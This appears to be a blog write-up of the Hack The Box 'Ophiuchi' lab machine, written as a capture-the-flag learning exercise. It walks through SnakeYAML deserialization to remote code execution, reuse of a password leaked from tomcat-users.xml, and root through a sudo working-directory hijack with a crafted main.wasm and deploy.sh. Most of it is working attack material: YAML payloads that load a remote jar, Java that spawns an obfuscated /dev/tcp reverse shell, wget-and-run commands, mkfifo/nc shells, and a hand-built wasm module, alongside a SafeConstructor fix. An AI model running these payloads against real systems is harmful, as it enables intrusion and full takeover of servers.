Ophiuchi-htb-writeup

0x00 Skills covered by this box

Skills in this chapter: YAML deserialization, SnakeYAML deserialization vulnerability, tomcat-users.xml password leak, sudo privilege escalation, relative-path (working directory) hijack under sudo

Reference: https://www.jgeek.cn/article/97.html

Reference: https://marmeus.com/post/Ophiuchi

Reference: https://www.r3pek.org/posts/htb-ophiuchi-box/

0x01 Getting a user shell

1. Target IP address: 10.10.10.227

2. Open ports:

┌──(kali㉿kali)-[~/桌面/tools/portscan]
└─$ sudo ./htb-portscan.sh 10.10.10.227 tcp
[sudo] password for kali:
Starting nmap port scan against 10.10.10.227...
* Running the TCP port scan...
sudo nmap -min-rate 10000 -p- "10.10.10.227" -oG "10.10.10.227"-tcp-braker-allports

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-16 16:00 CST
Nmap scan report for 10.10.10.227
Host is up (0.31s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
8080/tcp open http-proxy

Nmap done: 1 IP address (1 host up) scanned in 10.22 seconds
* Running TCP connect version detection, OS detection and default scripts against the open ports...
sudo nmap -sT -sV -sC -p"22,8080," "10.10.10.227"

Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-16 16:00 CST
Nmap scan report for 10.10.10.227
Host is up (0.31s latency).

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 6d:fc:68:e2:da:5e:80:df:bc:d0:45:f5:29:db:04:ee (RSA)
| 256 7a:c9:83:7e:13:cb:c3:f9:59:1e:53:21:ab:19:76:ab (ECDSA)
|_ 256 17:6b:c3:a8:fc:5d:36:08:a1:40:89:d2:f4:0a:c6:46 (ED25519)
8080/tcp open http Apache Tomcat 9.0.38
|_http-title: Parse YAML
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 22.96 seconds

3. Look at the service on port 8080:

http://10.10.10.227:8080/

4. Directory brute-forcing turned up nothing that looked like an entry point, so the YAML parsing feature on the home page is probably the way in.

5. YAML deserialization. I started to suspect this is what the box is testing. Since the site runs on a Java stack, it is probably Java YAML deserialization. Several public YAML deserialization PoCs and ordinary YAML documents all just returned a message about the security policy.

6. Submitting a single quote, however, produced an error message:

while scanning a quoted scalar
in 'string', line 1, column 1:
'
^
found unexpected end of stream
in 'string', line 1, column 2:
'
^

org.yaml.snakeyaml.scanner.ScannerImpl.scanFlowScalarSpaces(ScannerImpl.java:1916)
org.yaml.snakeyaml.scanner.ScannerImpl.scanFlowScalar(ScannerImpl.java:1831)
org.yaml.snakeyaml.scanner.ScannerImpl.fetchFlowScalar(ScannerImpl.java:1027)
org.yaml.snakeyaml.scanner.ScannerImpl.fetchSingle(ScannerImpl.java:1002)
org.yaml.snakeyaml.scanner.ScannerImpl.fetchMoreTokens(ScannerImpl.java:390)
org.yaml.snakeyaml.scanner.ScannerImpl.checkToken(ScannerImpl.java:227)
org.yaml.snakeyaml.parser.ParserImpl$ParseImplicitDocumentStart.produce(ParserImpl.java:195)
org.yaml.snakeyaml.parser.ParserImpl.peekEvent(ParserImpl.java:158)
org.yaml.snakeyaml.parser.ParserImpl.checkEvent(ParserImpl.java:148)
org.yaml.snakeyaml.composer.Composer.getSingleNode(Composer.java:118)
org.yaml.snakeyaml.constructor.BaseConstructor.getSingleData(BaseConstructor.java:150)
org.yaml.snakeyaml.Yaml.loadFromReader(Yaml.java:490)
org.yaml.snakeyaml.Yaml.load(Yaml.java:416)
Servlet.doPost(Servlet.java:15)
javax.servlet.http.HttpServlet.service(HttpServlet.java:652)
javax.servlet.http.HttpServlet.service(HttpServlet.java:733)
org.apache.tomcat.websocket.server.WsFilter.doFilter(WsFilter.java:53)

7. I was stuck for a long time, so I went straight to the published writeups.

SnakeYAML deserialization vulnerability - https://securitylab.github.com/research/swagger-yaml-parser-vulnerability/

The root cause is that untrusted YAML is parsed with SnakeYAML's default constructor. The `!!` tag syntax (`!!<fully qualified Java class>`) tells SnakeYAML to resolve that class on the classpath and invoke its constructor while the document is being loaded, so an attacker who controls the YAML can instantiate arbitrary classes, which leads to arbitrary code execution. The stack trace above already confirms the parser (`org.yaml.snakeyaml.Yaml.load`) and the call site (`Servlet.doPost`).
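As an added illustration (this is not code from the box, nor from any of the referenced writeups), the class below shows the shape of the vulnerable call the stack trace points at (`Yaml.load` inside `Servlet.doPost`) next to the hardened form. `YamlParseDemo`, `parseUnsafe` and `parseSafe` are names chosen here, and the callback host inside the payload is a placeholder:

```java
import org.yaml.snakeyaml.Yaml;
import org.yaml.snakeyaml.constructor.SafeConstructor;
import org.yaml.snakeyaml.error.YAMLException;

// Added example: the vulnerable pattern behind Servlet.doPost -> Yaml.load, and its fix.
// Class and method names are illustrative; the host in the payload is a placeholder.
public class YamlParseDemo {

    // Same shape as the probe sent to the box. SnakeYAML's default Constructor resolves
    // each global !!tag to a class on the classpath and calls a matching constructor.
    static final String PAYLOAD =
        "!!javax.script.ScriptEngineManager [\n" +
        "  !!java.net.URLClassLoader [[\n" +
        "    !!java.net.URL [\"http://attacker.invalid/\"]\n" +
        "  ]]\n" +
        "]\n";

    // Vulnerable: new Yaml() uses the full Constructor, so untrusted input can build a
    // ScriptEngineManager over a remote URLClassLoader (the chain exploited below).
    static Object parseUnsafe(String input) {
        return new Yaml().load(input);
    }

    // Hardened: SafeConstructor only builds standard YAML types (maps, lists, scalars)
    // and refuses every global !!tag before any class is looked up.
    // On SnakeYAML 2.x the constructor takes options: new SafeConstructor(new LoaderOptions()).
    static Object parseSafe(String input) {
        return new Yaml(new SafeConstructor()).load(input);
    }

    public static void main(String[] args) {
        // Benign documents still parse.
        System.out.println(parseSafe("name: demo\nready: 1\n"));

        // The attack document is rejected with a ConstructorException (a YAMLException).
        try {
            parseSafe(PAYLOAD);
            System.out.println("unexpected: payload accepted");
        } catch (YAMLException e) {
            System.out.println("rejected: " + e.getMessage());
        }
        // parseUnsafe(PAYLOAD) would instantiate ScriptEngineManager and trigger the
        // outbound fetch of META-INF/services/javax.script.ScriptEngineFactory,
        // which is exactly what the listener in step 8 observes.
    }
}
```

Compile it with snakeyaml 1.x on the classpath. The property that matters is that `SafeConstructor` decides on the tag alone, before any class is resolved; trying to blocklist individual dangerous classes instead leaves every other gadget on the classpath reachable.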

8. Submit a PoC to verify:

!!javax.script.ScriptEngineManager [
!!java.net.URLClassLoader [[
!!java.net.URL ["http://10.10.14.8/"]
]]
]

┌──(kali㉿kali)-[~/桌面]
└─$ nc -lvnp 80
listening on [any] 80 ...
connect to [10.10.14.8] from (UNKNOWN) [10.10.10.227] 41856
HEAD /META-INF/services/javax.script.ScriptEngineFactory HTTP/1.1
User-Agent: Java/11.0.8
Host: 10.10.14.8
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: keep-alive

9. The callback confirms the vulnerability: the target server fetched from the web server I started locally. I also noticed that it automatically requests /META-INF/services/javax.script.ScriptEngineFactory. That is ServiceLoader provider discovery: ScriptEngineManager asks the URLClassLoader for that resource, and any class listed in it is instantiated.

10. Following that lead, I found an exploitation article and used it to build the RCE chain against the target: https://pulsesecurity.co.nz/advisories/Insecure-YAML-Deserialisation

11. The following steps are fixed and cannot be skipped (both methods are correct, but I don't know why one fails; whether it's the environment or a version issue, I haven't figured it out yet).

https://github.com/artsploit/yaml-payload

┌──(kali㉿kali)-[~/桌面]
└─$ git clone https://github.com/artsploit/yaml-payload.git

┌──(kali㉿kali)-[~/桌面]
└─$ cd yaml-payload-master

┌──(kali㉿kali)-[~/桌面/yaml-payload-master]
└─$ ls
README.md src

┌──(kali㉿kali)-[~/桌面/yaml-payload-master]
└─$ cd src

┌──(kali㉿kali)-[~/桌面/yaml-payload-master/src]
└─$ ls
artsploit META-INF

┌──(kali㉿kali)-[~/桌面/yaml-payload-master/src]
└─$ cd artsploit

┌──(kali㉿kali)-[~/桌面/yaml-payload-master/src/artsploit]
└─$ ls
AwesomeScriptEngineFactory.java


Then edit AwesomeScriptEngineFactory.java. The original constructor looks like this:

    public AwesomeScriptEngineFactory() {
        try {
            Runtime.getRuntime().exec("dig scriptengine.x.artsploit.com");
            Runtime.getRuntime().exec("/Applications/Calculator.app/Contents/MacOS/Calculator");
        } catch (IOException e) {
            e.printStackTrace();
        }
    }

The two .exec() calls above need to be changed; the writeups offer two ways to do it.


Method 1:

Create a shell.sh file with the following content:

#!/bin/bash
touch /tmp/f; rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc 10.10.14.8 443 > /tmp/f

Then replace the two exec() lines with:

Runtime.getRuntime().exec("wget 10.10.14.8:80/shell.sh -O /tmp/shell.sh");
Runtime.getRuntime().exec("bash /tmp/shell.sh");


Method 2:


Replace the constructor body directly with the following.

Add two imports (java.util.Base64 and java.util.concurrent.TimeUnit, both part of the JDK rather than third-party libraries) and change the exploit code:

import java.util.Base64;
import java.util.concurrent.TimeUnit;


String cmd = "bash -i >& /dev/tcp/10.10.14.8/443 0>&1"; // <-- your actual command here
String b64Cmd = Base64.getEncoder().encodeToString(cmd.getBytes());
cmd = "bash -c {echo,"+b64Cmd+"}|{base64,-d}|{bash,-i}"; // *nix only
Runtime.getRuntime().exec(cmd).waitFor(30, TimeUnit.SECONDS); //increase this probably


I'll try both in a moment.


After editing, compile. Start with method 2:

┌──(kali㉿kali)-[~/桌面/yaml-payload-master/src/artsploit]
└─$ vim AwesomeScriptEngineFactory.java


javac src/artsploit/AwesomeScriptEngineFactory.java
jar -cvf yaml-payload.jar -C src/ .


┌──(kali㉿kali)-[~/桌面/yaml-payload-master/src/artsploit]
└─$ cd ../../

┌──(kali㉿kali)-[~/桌面/yaml-payload-master]
└─$ pwd
/home/kali/桌面/yaml-payload-master


┌──(kali㉿kali)-[~/桌面/yaml-payload-master]
└─$ javac src/artsploit/AwesomeScriptEngineFactory.java
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
src/artsploit/AwesomeScriptEngineFactory.java:21: error: unreported exception InterruptedException; must be caught or declared to be thrown
.waitFor(30, TimeUnit.SECONDS); //increase this probably
^
1 error


After asking an AI, I still had to add to it; here is the complete modification:



import javax.script.ScriptEngine;
import javax.script.ScriptEngineFactory;
import java.io.IOException;
import java.util.List;
import java.util.Base64;
import java.util.concurrent.TimeUnit;

public class AwesomeScriptEngineFactory implements ScriptEngineFactory {

    public AwesomeScriptEngineFactory() throws InterruptedException {
        try {
            // Runtime.getRuntime().exec("dig scriptengine.x.artsploit.com");
            // Runtime.getRuntime().exec("/Applications/Calculator.app/Contents/MacOS/Calculator");
            String cmd = "bash -i >& /dev/tcp/10.10.14.8/443 0>&1"; // <-- your actual command here
            String b64Cmd = Base64.getEncoder().encodeToString(cmd.getBytes());
            cmd = "bash -c {echo,"+b64Cmd+"}|{base64,-d}|{bash,-i}"; // *nix only
            Runtime.getRuntime()
                .exec(cmd)
                .waitFor(30, TimeUnit.SECONDS); //increase this probably
        } catch (IOException e) {
            e.printStackTrace();
        }
    }


The rest of the file is unchanged.


┌──(kali㉿kali)-[~/桌面/yaml-payload-master]
└─$ javac src/artsploit/AwesomeScriptEngineFactory.java
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true

┌──(kali㉿kali)-[~/桌面/yaml-payload-master]
└─$ jar -cvf yaml-payload.jar -C src/ .
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
added manifest
ignoring entry META-INF/
adding: META-INF/services/(in = 0) (out= 0)(stored 0%)
adding: META-INF/services/javax.script.ScriptEngineFactory(in = 36) (out= 38)(deflated -5%)
adding: artsploit/(in = 0) (out= 0)(stored 0%)
adding: artsploit/AwesomeScriptEngineFactory.class(in = 2582) (out= 1132)(deflated 56%)
adding: artsploit/AwesomeScriptEngineFactory.java(in = 2077) (out= 658)(deflated 68%)

┌──(kali㉿kali)-[~/桌面/yaml-payload-master]
└─$ ls
README.md src yaml-payload.jar


Now let's try it. First serve this directory over HTTP:


┌──(kali㉿kali)-[~/桌面/yaml-payload-master]
└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...




!!javax.script.ScriptEngineManager [
!!java.net.URLClassLoader [[
!!java.net.URL ["http://10.10.14.8/yaml-payload.jar"]
]]
]


The jar was fetched successfully, but I did not get a reverse shell, so let's try method 1.


┌──(kali㉿kali)-[~/桌面/yaml-payload-master]
└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.227 - - [16/Jan/2024 16:49:58] "GET /yaml-payload.jar HTTP/1.1" 200 -
10.10.10.227 - - [16/Jan/2024 16:49:59] "GET /yaml-payload.jar HTTP/1.1" 200 -



┌──(kali㉿kali)-[~/桌面/yaml-payload-master]
└─$ touch shell.sh

┌──(kali㉿kali)-[~/桌面/yaml-payload-master]
└─$ cat shell.sh
#!/bin/bash
touch /tmp/f; rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc 10.10.14.8 443 > /tmp/f


┌──(kali㉿kali)-[~/桌面/yaml-payload-master]
└─$ vim src/artsploit/AwesomeScriptEngineFactory.java


Runtime.getRuntime().exec("wget 10.10.14.8:80/shell.sh -O /tmp/shell.sh");
Runtime.getRuntime().exec("bash /tmp/shell.sh");


┌──(kali㉿kali)-[~/桌面/yaml-payload-master]
└─$ javac src/artsploit/AwesomeScriptEngineFactory.java
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true

┌──(kali㉿kali)-[~/桌面/yaml-payload-master]
└─$ jar -cvf yaml-payload.jar -C src/ .
Picked up _JAVA_OPTIONS: -Dawt.useSystemAAFontSettings=on -Dswing.aatext=true
added manifest
ignoring entry META-INF/
adding: META-INF/services/(in = 0) (out= 0)(stored 0%)
adding: META-INF/services/javax.script.ScriptEngineFactory(in = 36) (out= 38)(deflated -5%)
adding: artsploit/(in = 0) (out= 0)(stored 0%)
adding: artsploit/AwesomeScriptEngineFactory.class(in = 1692) (out= 721)(deflated 57%)
adding: artsploit/AwesomeScriptEngineFactory.java(in = 1652) (out= 451)(deflated 72%)

┌──(kali㉿kali)-[~/桌面/yaml-payload-master]
└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...


!!javax.script.ScriptEngineManager [
!!java.net.URLClassLoader [[
!!java.net.URL ["http://10.10.14.8/yaml-payload.jar"]
]]
]

A piece is still missing here: after getting the reverse shell, you read the config file to obtain the password.

String [] cmd = {"bash","-c","bash -i >& /dev/tcp/10.10.14.8/443 0>&1"};
Runtime.getRuntime().exec(cmd);

I changed it to this as well, and it still doesn't work, still errors.....

12. Skip this step and follow the writeups directly:


$ ls -la /home/admin
-r-------- 1 admin admin 33 Aug 9 13:08 user.txt


cat /opt/tomcat/conf/tomcat-users.xml

<user username="admin" password="whythereisalimit" roles="manager-gui,admin-gui"/>

13. The Tomcat manager password for admin is reused for the local admin account, so log in to the box over SSH with it and grab the first flag:

┌──(kali㉿kali)-[~/桌面]
└─$ ssh admin@10.10.10.227
The authenticity of host '10.10.10.227 (10.10.10.227)' can't be established.
ED25519 key fingerprint is SHA256:Ir/99B9NBdGfdwnV1xsklA2aGCcZLFQsIs1kUlEOvSs.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.227' (ED25519) to the list of known hosts.
admin@10.10.10.227's password:
Welcome to Ubuntu 20.04 LTS (GNU/Linux 5.4.0-51-generic x86_64)

* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage

System information as of Tue 16 Jan 2024 09:14:26 AM UTC

System load: 0.0
Usage of /: 20.0% of 27.43GB
Memory usage: 14%
Swap usage: 0%
Processes: 217
Users logged in: 0
IPv4 address for ens160: 10.10.10.227
IPv6 address for ens160: dead:beef::250:56ff:feb9:2a8


176 updates can be installed immediately.
56 of these updates are security updates.
To see these additional updates run: apt list --upgradable


The list of available updates is more than a week old.
To check for new updates run: sudo apt update

Last login: Mon Jan 11 08:23:12 2021 from 10.10.14.2
admin@ophiuchi:~$ ls
user.txt
admin@ophiuchi:~$ cat user.txt
7ec46714f412b9baa33cc41d04a01d75
admin@ophiuchi:~$

0x02 Getting root

14. sudo -l reveals something exploitable:

admin@ophiuchi:~$ sudo -l
Matching Defaults entries for admin on ophiuchi:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User admin may run the following commands on ophiuchi:
(ALL) NOPASSWD: /usr/bin/go run /opt/wasm-functions/index.go
admin@ophiuchi:~$

15. Inspect the .go file:

admin@ophiuchi:~$ cat /opt/wasm-functions/index.go
package main

import (
    "fmt"
    wasm "github.com/wasmerio/wasmer-go/wasmer"
    "os/exec"
    "log"
)


func main() {
    bytes, _ := wasm.ReadBytes("main.wasm")

    instance, _ := wasm.NewInstance(bytes)
    defer instance.Close()
    init := instance.Exports["info"]
    result,_ := init()
    f := result.String()
    if (f != "1") {
        fmt.Println("Not ready to deploy")
    } else {
        fmt.Println("Ready to deploy")
        out, err := exec.Command("/bin/sh", "deploy.sh").Output()
        if err != nil {
            log.Fatal(err)
        }
        fmt.Println(string(out))
    }
}
admin@ophiuchi:~$ ls -la /opt/wasm-functions/index.go
-rw-rw-r-- 1 root root 522 Oct 14 2020 /opt/wasm-functions/index.go
admin@ophiuchi:~$

16. This part is fairly hard; I doubt the exam would have anything this difficult.

First, note that the code imports os/exec, a package that exists to run external commands; when auditing code, look for high-risk functions and libraries like this first. Reading on, `wasm.ReadBytes("main.wasm")` loads an external main.wasm file.

Wasmer is an open-source runtime for executing WebAssembly on the server. It supports ultra-lightweight WebAssembly-based containers that can run anywhere, and it can be embedded in other programming languages.

So the program's logic is:

Read the WebAssembly module (main.wasm) as bytes
Instantiate the WebAssembly module
Fetch the exported `info` function from the instance
If `info` does not return 1, print "Not ready to deploy"
Otherwise run deploy.sh through /bin/sh via os/exec and print the script's output.

In that directory, check the file permissions first: main.wasm and deploy.sh are both owned by root and neither is writable by the current user. The good news is that neither path is absolute. `wasm.ReadBytes("main.wasm")` and `exec.Command("/bin/sh", "deploy.sh")` are resolved against the process's current working directory, not against the directory that holds index.go, and `sudo go run` inherits the caller's working directory. So all we need to do is create both files in a directory we control and run the sudo command from there. Note that this is not PATH lookup (/bin/sh is absolute); it is deploy.sh, passed as a script argument, that is opened relative to the cwd.

17. Let's exploit it.

admin@ophiuchi:~$ cd /opt/wasm-functions/
admin@ophiuchi:/opt/wasm-functions$ find . -ls
1057188 4 drwxr-xr-x 3 root root 4096 Oct 14 2020 .
1322036 2460 -rwxr-xr-x 1 root root 2516736 Oct 14 2020 ./index
1321998 4 -rw-rw-r-- 1 root root 522 Oct 14 2020 ./index.go
1057205 4 -rw-r--r-- 1 root root 88 Oct 14 2020 ./deploy.sh
1322001 1448 -rwxrwxr-x 1 root root 1479371 Oct 14 2020 ./main.wasm
1057190 4 drwxr-xr-x 2 root root 4096 Oct 14 2020 ./backup
1057210 4 -rw-r--r-- 1 root root 522 Oct 14 2020 ./backup/index.go
1057206 4 -rw-r--r-- 1 root root 88 Oct 14 2020 ./backup/deploy.sh
1057211 1448 -rwxr-xr-x 1 root root 1479371 Oct 14 2020 ./backup/main.wasm
admin@ophiuchi:/opt/wasm-functions$

Converting WebAssembly text format to wasm - https://developer.mozilla.org/zh-CN/docs/WebAssembly/Text_format_to_wasm

admin@ophiuchi:/opt/wasm-functions$ cd backup/
admin@ophiuchi:/opt/wasm-functions/backup$ ls
deploy.sh index.go main.wasm

admin@ophiuchi:/opt/wasm-functions/backup$ python3 -m http.server 8000
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
10.10.14.8 - - [16/Jan/2024 09:26:18] "GET / HTTP/1.1" 200 -
10.10.14.8 - - [16/Jan/2024 09:26:19] code 404, message File not found
10.10.14.8 - - [16/Jan/2024 09:26:19] "GET /favicon.ico HTTP/1.1" 404 -
10.10.14.8 - - [16/Jan/2024 09:26:21] "GET /main.wasm HTTP/1.1" 200 -

http://10.10.10.227:8000/main.wasm

┌──(kali㉿kali)-[~/桌面]
└─$ wasm2wat main.wasm -o main.wat

┌──(kali㉿kali)-[~/桌面]
└─$ vim main.wat

┌──(kali㉿kali)-[~/桌面]
└─$ wat2wasm main.wat -o main2.wasm

┌──(kali㉿kali)-[~/桌面]
└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.227 - - [16/Jan/2024 17:32:40] "GET /main2.wasm HTTP/1.1" 200 -

admin@ophiuchi:/opt/wasm-functions/backup$ cd /tmp
admin@ophiuchi:/tmp$ ls
hsperfdata_tomcat
systemd-private-ca85384315de47ecafbd2924a2fd91d6-systemd-logind.service-ejrfbh
systemd-private-ca85384315de47ecafbd2924a2fd91d6-systemd-resolved.service-CwFJxf
systemd-private-ca85384315de47ecafbd2924a2fd91d6-systemd-timesyncd.service-uwyoTh
vmware-root_671-3988556280
admin@ophiuchi:/tmp$ wget http://10.10.14.8/main2.wasm
--2024-01-16 09:32:40-- http://10.10.14.8/main2.wasm
Connecting to 10.10.14.8:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 112 [application/wasm]
Saving to: ‘main2.wasm’

main2.wasm 100%[====================================>] 112 --.-KB/s in 0s

2024-01-16 09:32:40 (3.75 MB/s) - ‘main2.wasm’ saved [112/112]

admin@ophiuchi:/tmp$

admin@ophiuchi:/tmp$ ls
hsperfdata_tomcat
main2.wasm
systemd-private-ca85384315de47ecafbd2924a2fd91d6-systemd-logind.service-ejrfbh
systemd-private-ca85384315de47ecafbd2924a2fd91d6-systemd-resolved.service-CwFJxf
systemd-private-ca85384315de47ecafbd2924a2fd91d6-systemd-timesyncd.service-uwyoTh
vmware-root_671-3988556280
admin@ophiuchi:/tmp$ cp main2.wasm /opt/wasm-functions/backup/main.wasm
cp: cannot create regular file '/opt/wasm-functions/backup/main.wasm': Permission denied
admin@ophiuchi:/tmp$ cp main2.wasm main.wasm
admin@ophiuchi:/tmp$ ls
hsperfdata_tomcat
main2.wasm
main.wasm
systemd-private-ca85384315de47ecafbd2924a2fd91d6-systemd-logind.service-ejrfbh
systemd-private-ca85384315de47ecafbd2924a2fd91d6-systemd-resolved.service-CwFJxf
systemd-private-ca85384315de47ecafbd2924a2fd91d6-systemd-timesyncd.service-uwyoTh
vmware-root_671-3988556280
admin@ophiuchi:/tmp$ touch deploy.sh
admin@ophiuchi:/tmp$ vim deploy.sh
admin@ophiuchi:/tmp$ cat deploy.sh
#!/bin/bash

# ToDo
# Create script to automatic deploy our new web at tomcat port 8080
touch /tmp/f; rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc 10.10.14.8 443 > /tmp/f
admin@ophiuchi:/tmp$

admin@ophiuchi:/tmp$ sudo /usr/bin/go run /opt/wasm-functions/index.go
Ready to deploy
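As an added example (this is not the box's own main.wasm, whose contents the writeup does not show), index.go only requires that the exported `info` function return 1, so a module of a few dozen bytes with nothing but that export is enough. The class below, written here for illustration, assembles exactly that module by hand; the equivalent text format is in the comment, and is what you would otherwise hand to wat2wasm. `InfoWasm` and `build` are names chosen for this example:

```java
import java.io.IOException;
import java.nio.file.Files;
import java.nio.file.Path;

// Added example: hand-assemble a minimal WebAssembly module whose exported
// "info" function returns a constant, so that index.go prints "Ready to deploy"
// and runs ./deploy.sh. Equivalent text format (what the main.wat edit boils down to):
//
//   (module
//     (func (export "info") (result i32)
//       i32.const 1))
//
public class InfoWasm {

    // Returns the 37-byte binary for the module above with i32.const <value>.
    // Only 0..63 are accepted so that every LEB128 field fits in a single byte.
    static byte[] build(int value) {
        if (value < 0 || value > 63) {
            throw new IllegalArgumentException("value must be in 0..63");
        }
        byte v = (byte) value;
        return new byte[] {
            0x00, 0x61, 0x73, 0x6d,                 // magic: "\0asm"
            0x01, 0x00, 0x00, 0x00,                 // binary format version 1
            // Type section (id 1), 5 bytes: one func type, no params, one i32 result
            0x01, 0x05, 0x01, 0x60, 0x00, 0x01, 0x7f,
            // Function section (id 3), 2 bytes: one function using type index 0
            0x03, 0x02, 0x01, 0x00,
            // Export section (id 7), 8 bytes: one export, name "info", kind 0 (func), index 0
            0x07, 0x08, 0x01, 0x04, 'i', 'n', 'f', 'o', 0x00, 0x00,
            // Code section (id 10), 6 bytes: one body of 4 bytes: no locals, i32.const v, end
            0x0a, 0x06, 0x01, 0x04, 0x00, 0x41, v, 0x0b
        };
    }

    public static void main(String[] args) throws IOException {
        Path out = Path.of(args.length > 0 ? args[0] : "main.wasm");
        byte[] module = build(1);
        Files.write(out, module);
        System.out.println("wrote " + out + " (" + module.length + " bytes)");
    }
}
```

Put the resulting main.wasm next to your own deploy.sh in a directory you can write to and run `sudo /usr/bin/go run /opt/wasm-functions/index.go` from that directory: wasmer looks the export up by name, `result.String()` yields "1", and deploy.sh is executed as root.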

18. The reverse shell comes back as root, and the final flag follows:

┌──(kali㉿kali)-[~/桌面]
└─$ nc -lvnp 443
listening on [any] 443 ...
connect to [10.10.14.8] from (UNKNOWN) [10.10.10.227] 48754
# id
uid=0(root) gid=0(root) groups=0(root)
# cat /root/root.tx
cat: /root/root.tx: No such file or directory
#
# cat /root/root.txt
04fe40ae052bd5a1c78679b1b506c0a1
#

19. Once I finish the boxes on that list, I should just pay for the official PG labs; the difficulty of these boxes is clearly unreasonable... the exam won't be this hard... this feels like doing advanced calculus...

0x03 Completion proof

https://www.hackthebox.com/achievement/machine/1705469/315


Ophiuchi-htb-writeup
https://sh1yan.top/2024/01/15/Ophiuchi-htb-writeup/
Author
shiyan
Published
2024-01-15
License